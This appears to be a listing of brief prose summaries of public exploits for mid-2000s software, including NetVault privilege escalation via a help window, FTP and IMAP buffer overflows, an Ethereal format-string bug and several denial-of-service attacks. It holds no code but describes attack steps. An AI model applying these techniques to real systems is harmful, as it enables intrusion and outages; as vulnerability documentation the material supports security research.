This exploit allows an attacker to gain access to the LocalSystem account by exploiting a vulnerability in the BakBone Software NetVault application. The attacker can use the FindWindow() API to locate the C:Program FilesBakBone SoftwareNetVaultbinnvstatsmngr.exe window, and then use the ShowWindow() API to make the window visible. The attacker can then use the What's This? feature to print a help topic, and then use the View Source feature to open Notepad. The attacker can then open cmd.exe from the system32 directory, which will run under the context of the LocalSystem account.
This exploit is for KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005). It sends a malicious USER command with a large number of 'A' characters followed by 'BBBB' to the FTP server, which causes a buffer overflow and crashes the server.
This exploit is used to crash the Mercury/32 service running on port 143. It sends a CHECK command with 512 A characters to the server, which causes the service to crash.
This exploit is for a buffer overflow vulnerability in WS_FTP Server Version 5.03. The exploit sends a specially crafted 'RNFR' command with an overly long argument to the FTP server, which causes a buffer overflow and crashes the service.
This module exploits a stack overflow in eDirectory 8.7.3 iMonitor service. This vulnerability was discovered by Peter Winter-Smith of NGSSoftware.
This module abuses a logic flaw in the Backup Exec Windows Agent to download arbitrary files from the system. This flaw was found by someone who wishes to remain anonymous and affects all known versions of the Backup Exec Windows Agent. The output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program listed in the references section.
A vulnerability exists in FlatNuke 2.5.5 (and possibly prior versions) that allows an attacker to execute arbitrary commands on the vulnerable system. This is due to the application not properly sanitizing user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable application.
Ethereal is used by network professionals around the world for troubleshooting, analysis, software and protocol development, and education. It has all of the standard features you would expect in a protocol analyzer, and several features not seen in any other product. Its open source license allows talented experts in the networking community to add enhancements. It runs on all popular computing platforms, including Unix, Linux, and Windows. Ethereal(v0.10.0 to v0.10.11) contains a remotely exploitable format string bug in its AFP dissector code(packet-afp.c). The vulnerable function is located in packet-afp.c in the dissect_reply_afp_get_server_param() function. This function uses the get_name() function to pluck a string(the "volume") from the packet and proceeds to pass it (improperly) to proto_item_set_text() which uses formats. This exploit uses the DSI/afpovertcp(548) TCP port as a means of exploiting this. The port does NOT have to be open to exploit this as you can send spoofed packets or connect to a different port(explained in the next paragraph) to get the job done. Ethereal may rely on the source port, if no dissector is found for the destination port, to decide what dissector to use on a packet. This means ANY destination port may be used, granted it has no destination port dissector. (ie. port 80 won't work, but port 1234 will) As for exploiting this, it is somewhat special. There is no user-supplied data(thats exploitable) in the packet, so the only way to exploit this is to send a packet with a format string in the "volume" field.
nbSMTP v0.99 remote format string exploit is a vulnerability that allows an attacker to execute arbitrary code on the target system by sending maliciously crafted data to the vulnerable application. The exploit uses a return address and shellcode address to build an evil buffer and then sends it to the vulnerable application. The exploit was tested on Slackware Linux 9.0, 10.0 and 10.1.
This exploit is used to cause a denial of service (DoS) on Acunetix HTTP Sniffer. It sends a large number of requests with a large content-length header to the server, causing it to run out of memory and crash.
Services By CQR